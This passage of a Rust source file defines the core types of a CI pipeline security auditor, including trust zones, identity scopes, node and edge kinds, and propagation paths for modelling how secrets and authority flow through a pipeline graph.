1219/// by `apply_compensating_controls` to downgrade severity on findings whose
1220/// firing step is gated behind a conditional.
1221pub const META_CONDITION: &str = "condition";
1222/// Step-level metadata: comma-joined list of upstream stage / job names this
1223/// step's container declared via a non-default `dependsOn:` value. Default ADO
1224/// behaviour ("depends on the previous job/stage") is NOT stamped — only
1225/// explicit overrides. Currently a parser-side hook for future cross-job
1226/// taint rules; no consumer rule exists yet.
1227pub const META_DEPENDS_ON: &str = "depends_on";
1228
1229// ── Shared serde helpers ─────────────────────────────────────────
1230
1231/// Serialize a `HashMap<String, V>` with keys in sorted order. The
1232/// in-memory representation stays a `HashMap` (cheaper insertion, hot
1233/// path on every parser); only the serialized form is canonicalised.
1234/// This is the single point of determinism control for graph metadata
1235/// emitted via JSON / SARIF / CloudEvents — without it, HashMap iteration
1236/// order leaks per-process randomness into every diff and cache key.
1237///
1238/// Public so the engine crate (`taudit-core`) can apply the same
1239/// canonical ordering to its `AuthorityGraph` HashMap fields.
1240#[doc(hidden)]
1241pub fn serialize_string_map_sorted<S, V>(
1242    map: &HashMap<String, V>,
1243    serializer: S,
1244) -> Result<S::Ok, S::Error>
1245where
1246    S: Serializer,
1247    V: Serialize,
1248{
1249    let sorted: BTreeMap<&String, &V> = map.iter().collect();
1250    sorted.serialize(serializer)
1251}
1252
1253// ── Graph-level precision markers ────────────────────────────────
1254
1255/// The category of reason why a graph is partial.
1256#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Serialize, Deserialize)]
1257#[serde(rename_all = "snake_case")]
1258pub enum GapKind {
1259    /// A template or matrix expression hides a value; graph structure is intact.
1260    Expression,
1261    /// An unresolvable component (composite action, reusable workflow, extends,
1262    /// include) breaks the authority chain.
1263    Structural,
1264    /// The graph cannot be built at all (zero steps produced, unknown platform).
1265    Opaque,
1266}
1267
1268/// How complete is this authority graph? Parsers set this based on whether
1269/// they could fully resolve all authority relationships in the pipeline YAML.
1270///
1271/// A `Partial` graph is still useful — it just tells the consumer that some
1272/// authority paths may be missing. This is better than silent incompleteness.
1273#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Serialize, Deserialize)]
1274#[serde(rename_all = "snake_case")]
1275pub enum AuthorityCompleteness {
1276    /// Parser resolved all authority relationships.
1277    Complete,
1278    /// Parser found constructs it couldn't fully resolve (e.g. secrets in
1279    /// shell strings, composite actions, reusable workflows). The graph
1280    /// captures what it can, but edges may be missing.
1281    Partial,
1282    /// Parser couldn't determine completeness.
1283    Unknown,
1284}
1285
1286/// How broad is an identity's scope? Classifies the risk surface of tokens,
1287/// service principals, and OIDC identities.
1288#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Serialize, Deserialize)]
1289#[serde(rename_all = "snake_case")]
1290pub enum IdentityScope {
1291    /// Wide permissions: write-all, admin, or unscoped tokens.
1292    Broad,
1293    /// Narrow permissions: contents:read, specific scopes.
1294    Constrained,
1295    /// Scope couldn't be determined — treat as risky.
1296    Unknown,
1297}
1298
1299impl IdentityScope {
1300    /// Classify an identity scope from a permissions string.
1301    pub fn from_permissions(perms: &str) -> Self {
1302        let p = perms.to_lowercase();
1303        if p.contains("write-all") || p.contains("admin") || p == "{}" || p.is_empty() {
1304            IdentityScope::Broad
1305        } else if p.contains("write") {
1306            // Any write permission = broad (conservative)
1307            IdentityScope::Broad
1308        } else if p.contains("read") {
1309            IdentityScope::Constrained
1310        } else {
1311            IdentityScope::Unknown
1312        }
1313    }
1314}
1315
1316// ── Node types ───────────────────────────────────────────────────
1317
1318/// Semantic kind of a graph node.
1319#[allow(missing_docs)]
1320#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Serialize, Deserialize)]
1321#[serde(rename_all = "snake_case")]
1322pub enum NodeKind {
1323    Step,
1324    Secret,
1325    Artifact,
1326    Identity,
1327    Image,
1328}
1329
1330/// Trust classification. Explicit on every node — not inferred from kind.
1331#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Serialize, Deserialize)]
1332#[serde(rename_all = "snake_case")]
1333pub enum TrustZone {
1334    /// Code/config authored by the repo owner.
1335    FirstParty,
1336    /// Marketplace actions, external images (pinned).
1337    ThirdParty,
1338    /// Unpinned actions, fork PRs, user input.
1339    Untrusted,
1340}
1341
1342impl TrustZone {
1343    /// Returns true if `self` is a lower trust level than `other`.
1344    pub fn is_lower_than(&self, other: &TrustZone) -> bool {
1345        self.rank() < other.rank()
1346    }
1347
1348    fn rank(&self) -> u8 {
1349        match self {
1350            TrustZone::FirstParty => 2,
1351            TrustZone::ThirdParty => 1,
1352            TrustZone::Untrusted => 0,
1353        }
1354    }
1355}
1356
1357/// A node in the authority graph.
1358#[allow(missing_docs)]
1359#[derive(Debug, Clone, Serialize, Deserialize)]
1360pub struct Node {
1361    pub id: NodeId,
1362    pub kind: NodeKind,
1363    pub name: String,
1364    pub trust_zone: TrustZone,
1365    /// Flexible metadata: pinning status, digest, scope, permissions, etc.
1366    /// Serialized in sorted-key order so JSON / SARIF / CloudEvents output
1367    /// is byte-deterministic across runs (HashMap iteration is randomised
1368    /// per process, which would otherwise break diffs and cache keys).
1369    #[serde(serialize_with = "serialize_string_map_sorted")]
1370    pub metadata: HashMap<String, String>,
1371}
1372
1373// ── Edge types ───────────────────────────────────────────────────
1374
1375/// Edge semantics model authority/data flow — not syntactic YAML relations.
1376/// Design test: "Can authority propagate along this edge?"
1377#[derive(Debug, Clone, Copy, PartialEq, Eq, PartialOrd, Ord, Hash, Serialize, Deserialize)]
1378#[serde(rename_all = "snake_case")]
1379pub enum EdgeKind {
1380    /// Step -> Secret or Identity (authority granted at runtime).
1381    HasAccessTo,
1382    /// Step -> Artifact (data flows out).
1383    Produces,
1384    /// Artifact -> Step (authority flows from artifact to consuming step).
1385    Consumes,
1386    /// Step -> Image/Action (execution delegation).
1387    UsesImage,
1388    /// Step -> Step (cross-job or action boundary).
1389    DelegatesTo,
1390    /// Step -> Secret or Identity (credential written to disk, outliving the step's lifetime).
1391    /// Distinct from HasAccessTo: disk persistence is accessible to all subsequent steps
1392    /// and processes with filesystem access, not just the step that created it.
1393    PersistsTo,
1394}
1395
1396/// Abbreviated authority context for **`HasAccessTo` → identity** edges in
1397/// JSON exports (ADR 0002 Phase 2). Copied from the target identity’s trust
1398/// zone and selected `metadata` keys so consumers need not reverse-engineer
1399/// raw `META_*` strings for common questions. Omitted on edges where absent.
1400#[derive(Debug, Clone, Default, PartialEq, Eq, Serialize, Deserialize)]
1401pub struct AuthorityEdgeSummary {
1402    /// Target identity trust zone (`first_party` / `third_party` / `untrusted`).
1403    #[serde(default, skip_serializing_if = "Option::is_none")]
1404    pub trust_zone: Option<String>,
1405    /// Copy of `identity_scope` metadata when present.
1406    #[serde(default, skip_serializing_if = "Option::is_none")]
1407    pub identity_scope: Option<String>,
1408    /// Copy of `permissions` metadata when present, truncated for bounded JSON.
1409    #[serde(default, skip_serializing_if = "Option::is_none")]
1410    pub permissions_summary: Option<String>,
1411}
1412
1413/// Maximum characters per summary string field on [`AuthorityEdgeSummary`].
1414pub const AUTHORITY_EDGE_SUMMARY_FIELD_MAX: usize = 192;
1415
1416/// A directed edge in the authority graph.
1417#[allow(missing_docs)]
1418#[derive(Debug, Clone, Serialize, Deserialize)]
1419pub struct Edge {
1420    pub id: EdgeId,
1421    pub from: NodeId,
1422    pub to: NodeId,
1423    pub kind: EdgeKind,
1424    /// Present on `has_access_to` edges whose target is an identity node.
1425    #[serde(default, skip_serializing_if = "Option::is_none")]
1426    pub authority_summary: Option<AuthorityEdgeSummary>,
1427}
1428
1429// ── Pipeline source ──────────────────────────────────────────────
1430
1431/// Where the pipeline definition came from.
1432#[allow(missing_docs)]
1433#[derive(Debug, Clone, Serialize, Deserialize)]
1434pub struct PipelineSource {
1435    pub file: String,
1436    #[serde(skip_serializing_if = "Option::is_none")]
1437    pub repo: Option<String>,
1438    #[serde(skip_serializing_if = "Option::is_none")]
1439    pub git_ref: Option<String>,
1440    /// SHA of the commit being analyzed; reproducibility hint when set.
1441    /// Parsers leave None; CI integrations populate this from the build env.
1442    #[serde(default, skip_serializing_if = "Option::is_none")]
1443    pub commit_sha: Option<String>,
1444}
1445
1446// ── Pipeline parameter spec ──────────────────────────────────────
1447
1448/// Pipeline-level parameter declaration captured from a top-level
1449/// `parameters:` block. Used by rules that need to reason about whether
1450/// caller-supplied parameter values are constrained (`values:` allowlist)
1451/// or free-form (no allowlist on a string parameter — shell-injection risk).
1452#[derive(Debug, Clone, Serialize, Deserialize)]
1453pub struct ParamSpec {
1454    /// Declared parameter type (`string`, `number`, `boolean`, `object`, etc.).
1455    /// Empty string when the YAML omitted `type:` (ADO defaults to string).
1456    pub param_type: String,
1457    /// True when the parameter declares a `values:` allowlist that constrains
1458    /// the set of acceptable inputs. When true, free-form shell injection is
1459    /// not possible because the runtime rejects any value outside the list.
1460    pub has_values_allowlist: bool,
1461}
1462
1463// ── Propagation path (wire type for Finding.path) ────────────────
1464
1465/// A path that authority took through the graph.
1466/// The path is the product — it's what makes findings persuasive.
1467///
1468/// This is a **wire type**: it serialises into `Finding.path` in JSON output
1469/// and SARIF `properties.path`. The BFS algorithm that produces these paths
1470/// lives in `taudit-core::propagation` (workspace-internal); this struct is
1471/// the stable contract.
1472#[allow(missing_docs)]
1473#[derive(Debug, Clone, Serialize, Deserialize)]
1474pub struct PropagationPath {
1475    /// The authority origin (Secret or Identity).
1476    pub source: NodeId,
1477    /// Where authority ended up.
1478    pub sink: NodeId,
1479    /// The full edge path from source to sink.
1480    pub edges: Vec<EdgeId>,
1481    /// Did this path cross a trust zone boundary?
1482    pub crossed_boundary: bool,
1483    /// If crossed, from which zone to which zone.
1484    #[serde(skip_serializing_if = "Option::is_none")]
1485    pub boundary_crossing: Option<(TrustZone, TrustZone)>,
1486}
taudit_api/lib.rs

taudit_api/
lib.rs